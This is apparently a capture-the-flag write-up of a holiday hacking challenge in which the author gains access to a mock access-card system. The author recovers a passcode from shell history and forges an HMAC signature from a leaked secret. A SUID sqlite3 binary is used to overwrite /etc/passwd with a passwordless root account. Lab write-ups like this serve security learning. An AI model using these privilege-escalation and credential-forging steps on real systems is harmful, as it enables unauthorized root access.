Hardware Hacking 101 - Part 2
Santa's gone missing, and the only way to track him is by accessing the Wish List in his chest-modify the access_cards database to gain entry!
Difficulty: ❄ ❄ ❄ ❄ ❄
Santa’s gone missing, and the only way to track him is by accessing the Wish List in his chest-modify the access_cards database to gain entry!
Hints
It’s In the Signature
From: Jewel Loggins
I seem to remember there being a handy HMAC generator included in CyberChef.
Hidden in Plain Sight
From: Jewel Loggins
It is so important to keep sensitive data like passwords secure. Often times, when typing passwords into a CLI (Command Line Interface) they get added to log files and other easy to access locations. It makes it trivial to step back in history and identify the password.
Silver trophy
The Santa's Little Helper - Access Card Maintenance Tool needs a password to modify the cards:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
--------------------------------------------------------
___ _ _ _
/ __| | | | || |
\__ \ | |__ | __ |
|___/ |____| |_||_|
_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'
--------------------------------------------------------
Santa's Little Helper - Access Card Maintenance Tool
Tool Name: slh
options:
-h, --help show this help message and exit
--view-config View current configuration.
--view-cards View current values of all access cards.
--view-card ID View a single access card by ID.
--set-access ACCESS_LEVEL
Set access level of access card. Must be 0 (No Access) or 1 (Full Access).
--id ID ID of card to modify.
--passcode PASSCODE Passcode to make changes.
--new-card Generate a new card ID.
--------------------------------------------------------
1
2
3
4
5
slh@slhconsole\> slh --view-card 42
Details of card with ID: 42
(42, 'c06018b6-5e80-4395-ab71-ae5124560189', 0, 'ecb9de15a057305e5887502d46d434c9394f5ed7ef1a51d2930ad786b02f6ffd')
slh@slhconsole\> slh --set-access 1 --id 42
Invalid passcode. Access not granted.
After a little bit of poking I could find the password in the history:
1
2
3
4
slh@slhconsole\> history | grep slh
9 slh --help
11 slh --passcode CandyCaneCrunch77 --set-access 1 --id 143
31 history | grep slh
Changing its access level granted the Silver trophy:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
slh@slhconsole\> slh --passcode CandyCaneCrunch77 --set-access 1 --id 42
* * * * * * * * * * *
* *
* ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ *
* $$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ *
* $$ __$$\ $$ __$$\ $$ __$$\ $$ _____|$$ __$$\ $$ __$$\ *
*$$ / $$ |$$ / \__|$$ / \__|$$ | $$ / \__|$$ / \__| *
$$$$$$$$ |$$ | $$ | $$$$$\ \$$$$$$\ \$$$$$$\
*$$ __$$ |$$ | $$ | $$ __| \____$$\ \____$$\ *
* $$ | $$ |$$ | $$\ $$ | $$\ $$ | $$\ $$ |$$\ $$ | *
* $$ | $$ |\$$$$$$ |\$$$$$$ |$$$$$$$$\ \$$$$$$ |\$$$$$$ | *
* \__| \__| \______/ \______/ \________| \______/ \______/ *
* * ❄ ❄ * ❄ ❄ ❄ *
* * * * * * * * * *
* $$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$$\ $$$$$$$\ $$\ *
* $$ __$$\ $$ __$$\ $$ __$$\ $$$\ $$ |\__$$ __|$$ _____|$$ __$$\ $$ | *
* $$ / \__|$$ | $$ |$$ / $$ |$$$$\ $$ | $$ | $$ | $$ | $$ |$$ |*
* $$ |$$$$\ $$$$$$$ |$$$$$$$$ |$$ $$\$$ | $$ | $$$$$\ $$ | $$ |$$ | *
* $$ |\_$$ |$$ __$$< $$ __$$ |$$ \$$$$ | $$ | $$ __| $$ | $$ |\__|*
* $$ | $$ |$$ | $$ |$$ | $$ |$$ |\$$$ | $$ | $$ | $$ | $$ | *
* \$$$$$$ |$$ | $$ |$$ | $$ |$$ | \$$ | $$ | $$$$$$$$\ $$$$$$$ |$$\ *
* \______/ \__| \__|\__| \__|\__| \__| \__| \________|\_______/ \__| *
* ❄ ❄ ❄ *
* * * * * * * * * * * * * * *
Card 42 granted access level 1.
Gold Trophy
For the Gold trophy, I followed the hint by Jewel again: “There’s a tougher route if you’re up for the challenge to earn the Gold medal. It involves directly modifying the database and generating your own HMAC signature.”.
Looking at the files, I found access_cards being a SQLite DB:
1
2
3
4
slh@slhconsole\> ls
access_cards
slh@slhconsole\> file access_cards
access_cards: SQLite 3.x database, last written using SQLite version 3040001, file counter 4, database pages 32, cookie 0x2, schema 4, UTF-8, version-valid-for 4
Inspecting its contents I found the config table containing the HMAC secret and the expected format:
1
2
3
4
5
6
7
8
9
10
slh@slhconsole\> sqlite3 access_cards
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
access_cards config
sqlite> SELECT * FROM config;
1|hmac_secret|9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e
2|hmac_message_format|{access}{uuid}
3|admin_password|3a40ae3f3fd57b2a4513cca783609589dbe51ce5e69739a33141c5717c20c9c1
4|app_version|1.0
A very quick python script later, I got the signature:
1
2
3
4
5
6
import hmac
import hashlib
secret_key = b"9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e"
access_uuid = b"1c06018b6-5e80-4395-ab71-ae5124560189"
signature = hmac.new(secret_key, access_uuid, hashlib.sha256).hexdigest()
print("signature = {0}".format(signature))
1
2
(env) thedead@maccos act1-hardware-hacking % python3 generateSignature.py
signature = 135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096
Updating the SQLite DB accordingly, got me the Gold:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
slh@slhconsole\> sqlite3 access_cards 'UPDATE access_cards SET access = 1, sig = "135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096" WHERE id = 42;'
* * * * * * * * * * *
* *
* ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ ❄ *
* $$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ *
* $$ __$$\ $$ __$$\ $$ __$$\ $$ _____|$$ __$$\ $$ __$$\ *
*$$ / $$ |$$ / \__|$$ / \__|$$ | $$ / \__|$$ / \__| *
$$$$$$$$ |$$ | $$ | $$$$$\ \$$$$$$\ \$$$$$$\
*$$ __$$ |$$ | $$ | $$ __| \____$$\ \____$$\ *
* $$ | $$ |$$ | $$\ $$ | $$\ $$ | $$\ $$ |$$\ $$ | *
* $$ | $$ |\$$$$$$ |\$$$$$$ |$$$$$$$$\ \$$$$$$ |\$$$$$$ | *
* \__| \__| \______/ \______/ \________| \______/ \______/ *
* * ❄ ❄ * ❄ ❄ ❄ *
* * * * * * * * * *
* $$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$$\ $$$$$$$\ $$\ *
* $$ __$$\ $$ __$$\ $$ __$$\ $$$\ $$ |\__$$ __|$$ _____|$$ __$$\ $$ | *
* $$ / \__|$$ | $$ |$$ / $$ |$$$$\ $$ | $$ | $$ | $$ | $$ |$$ |*
* $$ |$$$$\ $$$$$$$ |$$$$$$$$ |$$ $$\$$ | $$ | $$$$$\ $$ | $$ |$$ | *
* $$ |\_$$ |$$ __$$< $$ __$$ |$$ \$$$$ | $$ | $$ __| $$ | $$ |\__|*
* $$ | $$ |$$ | $$ |$$ | $$ |$$ |\$$$ | $$ | $$ | $$ | $$ | *
* \$$$$$$ |$$ | $$ |$$ | $$ |$$ | \$$ | $$ | $$$$$$$$\ $$$$$$$ |$$\ *
* \______/ \__| \__|\__| \__|\__| \__| \__| \________|\_______/ \__| *
* ❄ ❄ ❄ *
* * * * * * * * * * * * * * *
Funsies
I have no name!@slhconsole\>
It took me some time to realize I just had to use the already available hmac_secret and I eventually found the file entrypoint.sh:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
slh@slhconsole\> cat /entrypoint.sh
#!/bin/bash
# Run the HMAC checking as root
/root/check_hmac &
# Get the PID of the background process if needed
HMAC_PID=$!
# Switch to the slh user to run the main application
su -c "/usr/bin/main" slh
# Optionally wait for the background process (HMAC checking script)
wait $HMAC_PID
This file was referring to /root/check_hmac but I didn’t have the rights to access it:
1
2
slh@slhconsole\> file /root/check_hmac
/root/check_hmac: cannot open `/root/check_hmac' (Permission denied)
So I went after suid executables and found the sqlite executable:
1
2
3
4
5
6
7
8
9
10
11
slh@slhconsole\> find / -perm -4000 -print 2>/dev/null
/usr/bin/chsh
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/sqlite3
/usr/bin/slh
I then created myself a user and elevated privileges:
1
2
3
4
5
6
slh@slhconsole\> sqlite3 /dev/null -cmd ".output /etc/passwd" 'select "thedead::0:0:root:/root:/bin/bash";'
slh@slhconsole\> su thedead
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
thedead@98d3ae5e5586:/home/slh# file /root/check_hmac
/root/check_hmac: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4900f1057c817d78f6abf8c33793107b79dcd1a7, for GNU/Linux 2.6.32, stripped
Obviously, that led to nothing, but if I exited and restarted the terminal I got a nice user called I have no name!: 
No route to hose
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
In: elvenconsole@1e000c00
Out: elvenconsole@1e000c00
Err: elvenconsole@1e000c00
Net:
Warning: eth@1e100000 (eth0) using random MAC address - 5e:69:c8:f8:cf:5b
eth0: eth@1e100000
Hit any key to stop autoboot: 0
Reindeer_PCIE_SET: gpio[19]=1
Using eth@1e100000 device
TFTP from server 192.168.54.25; our IP address is 192.168.54.5
Filename 'magic_firmware.bin'.
Load address: 0x80010000
Loading: *
North Pole Retry count exceeded; starting again
=> ping 127.0.0.1
Not route to hose